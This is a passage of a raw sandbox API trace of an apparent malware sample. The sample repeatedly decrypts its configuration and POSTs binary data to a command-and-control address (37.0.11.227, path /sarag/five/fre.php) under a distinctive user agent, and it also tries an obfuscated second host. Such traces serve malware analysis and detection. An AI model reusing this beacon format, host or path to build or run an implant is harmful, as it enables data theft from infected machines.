(lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.649] CryptImportKey (in: hProv=0x6af100, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0239.649] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.649] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0239.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.650] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0239.650] GetProcessHeap () returned 0x690000 [0239.651] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0239.651] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.651] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0239.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.652] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0239.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.653] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0239.653] GetProcessHeap () returned 0x690000 [0239.653] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0239.654] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.654] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0239.654] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.655] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0239.655] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.656] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0239.656] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.657] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0239.657] GetProcessHeap () returned 0x690000 [0239.657] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0239.657] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0239.657] GetProcessHeap () returned 0x690000 [0239.657] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab380 [0239.657] socket (af=2, type=1, protocol=6) returned 0x644 [0239.657] connect (s=0x644, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0239.680] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0239.680] GetProcessHeap () returned 0x690000 [0239.680] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0239.680] GetProcessHeap () returned 0x690000 [0239.680] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b77b0 [0239.680] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0239.681] wvsprintfA (in: param_1=0x6b77b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0239.681] GetProcessHeap () returned 0x690000 [0239.681] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af440 [0239.681] GetProcessHeap () returned 0x690000 [0239.681] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b77b0 | out: hHeap=0x690000) returned 1 [0239.681] GetProcessHeap () returned 0x690000 [0239.681] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0239.681] GetProcessHeap () returned 0x690000 [0239.682] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b77b0 [0239.682] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0239.683] wvsprintfA (in: param_1=0x6b77b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0239.683] GetProcessHeap () returned 0x690000 [0239.683] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0239.683] GetProcessHeap () returned 0x690000 [0239.683] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b77b0 | out: hHeap=0x690000) returned 1 [0239.683] send (s=0x644, buf=0x6ad508*, len=242, flags=0) returned 242 [0239.683] send (s=0x644, buf=0x6aba40*, len=159, flags=0) returned 159 [0239.684] GetProcessHeap () returned 0x690000 [0239.684] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0239.684] recv (in: s=0x644, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0239.752] GetProcessHeap () returned 0x690000 [0239.752] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0239.752] GetProcessHeap () returned 0x690000 [0239.753] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0239.753] GetProcessHeap () returned 0x690000 [0239.753] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af440 | out: hHeap=0x690000) returned 1 [0239.753] GetProcessHeap () returned 0x690000 [0239.753] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0239.754] closesocket (s=0x644) returned 0 [0239.754] GetProcessHeap () returned 0x690000 [0239.754] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab380 | out: hHeap=0x690000) returned 1 [0239.754] GetProcessHeap () returned 0x690000 [0239.754] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0239.755] GetProcessHeap () returned 0x690000 [0239.755] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0239.755] GetProcessHeap () returned 0x690000 [0239.755] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0239.755] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1328) returned 0x644 [0239.757] Sleep (dwMilliseconds=0xea60) [0239.758] GetProcessHeap () returned 0x690000 [0239.758] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0239.759] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.759] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0239.763] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.764] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0239.769] GetProcessHeap () returned 0x690000 [0239.769] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0239.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.770] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0239.770] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.771] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0239.771] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.771] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0239.771] GetProcessHeap () returned 0x690000 [0239.772] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0239.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.773] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0239.773] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.773] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0239.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.774] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0239.774] GetProcessHeap () returned 0x690000 [0239.774] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0239.775] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.775] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0239.776] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.776] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0239.777] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.777] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0239.778] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.778] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0239.778] GetProcessHeap () returned 0x690000 [0239.778] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0239.778] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0239.778] GetProcessHeap () returned 0x690000 [0239.779] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0239.779] GetProcessHeap () returned 0x690000 [0239.779] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0239.779] GetProcessHeap () returned 0x690000 [0239.779] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0239.779] GetProcessHeap () returned 0x690000 [0239.780] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0239.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.782] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0239.787] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.787] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0239.793] GetProcessHeap () returned 0x690000 [0239.793] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0239.793] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.794] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0239.794] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.794] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0239.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.795] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0239.795] GetProcessHeap () returned 0x690000 [0239.796] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0239.796] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.797] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0239.797] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.797] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0239.798] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.798] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0239.798] GetProcessHeap () returned 0x690000 [0239.798] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0239.799] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.799] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0239.800] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.800] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0239.801] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.801] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0239.801] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.802] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0239.802] GetProcessHeap () returned 0x690000 [0239.802] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0239.802] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0239.802] GetProcessHeap () returned 0x690000 [0239.802] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4d0 [0239.802] socket (af=2, type=1, protocol=6) returned 0x648 [0239.802] connect (s=0x648, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0239.839] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0239.839] GetProcessHeap () returned 0x690000 [0239.840] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0239.840] GetProcessHeap () returned 0x690000 [0239.840] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b77b0 [0239.840] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0239.841] wvsprintfA (in: param_1=0x6b77b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0239.841] GetProcessHeap () returned 0x690000 [0239.841] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0239.841] GetProcessHeap () returned 0x690000 [0239.842] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b77b0 | out: hHeap=0x690000) returned 1 [0239.842] GetProcessHeap () returned 0x690000 [0239.842] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0239.842] GetProcessHeap () returned 0x690000 [0239.842] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b77b0 [0239.843] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0239.844] wvsprintfA (in: param_1=0x6b77b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0239.844] GetProcessHeap () returned 0x690000 [0239.844] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0239.844] GetProcessHeap () returned 0x690000 [0239.845] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b77b0 | out: hHeap=0x690000) returned 1 [0239.845] send (s=0x648, buf=0x6ab500*, len=242, flags=0) returned 242 [0239.845] send (s=0x648, buf=0x6aba40*, len=159, flags=0) returned 159 [0239.846] GetProcessHeap () returned 0x690000 [0239.846] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0239.846] recv (in: s=0x648, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0239.931] GetProcessHeap () returned 0x690000 [0239.931] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0239.932] GetProcessHeap () returned 0x690000 [0239.932] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0239.932] GetProcessHeap () returned 0x690000 [0239.932] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0239.932] GetProcessHeap () returned 0x690000 [0239.933] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0239.933] closesocket (s=0x648) returned 0 [0239.933] GetProcessHeap () returned 0x690000 [0239.933] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4d0 | out: hHeap=0x690000) returned 1 [0239.933] GetProcessHeap () returned 0x690000 [0239.934] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0239.934] GetProcessHeap () returned 0x690000 [0239.934] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0239.934] GetProcessHeap () returned 0x690000 [0239.935] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0239.952] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1020) returned 0x648 [0239.953] Sleep (dwMilliseconds=0xea60) [0239.958] GetProcessHeap () returned 0x690000 [0239.958] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0239.958] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.959] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0239.966] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.966] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0239.972] GetProcessHeap () returned 0x690000 [0239.972] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0239.973] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.973] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0239.974] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.974] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0239.975] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.975] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0239.975] GetProcessHeap () returned 0x690000 [0239.976] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0239.976] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.977] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0239.977] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.977] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0239.978] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.978] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0239.978] GetProcessHeap () returned 0x690000 [0239.978] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0239.979] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.979] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0239.980] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.980] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0239.981] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.981] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0239.982] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.982] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0239.982] GetProcessHeap () returned 0x690000 [0239.982] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0239.982] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0239.983] GetProcessHeap () returned 0x690000 [0239.983] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0239.983] GetProcessHeap () returned 0x690000 [0239.983] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0239.983] GetProcessHeap () returned 0x690000 [0239.984] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0239.984] GetProcessHeap () returned 0x690000 [0239.984] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0239.988] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.989] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0239.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.995] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0240.002] GetProcessHeap () returned 0x690000 [0240.002] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0240.003] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.003] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0240.004] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.004] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0240.005] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.005] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0240.005] GetProcessHeap () returned 0x690000 [0240.006] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0240.006] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.007] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0240.007] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.008] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0240.009] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.009] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 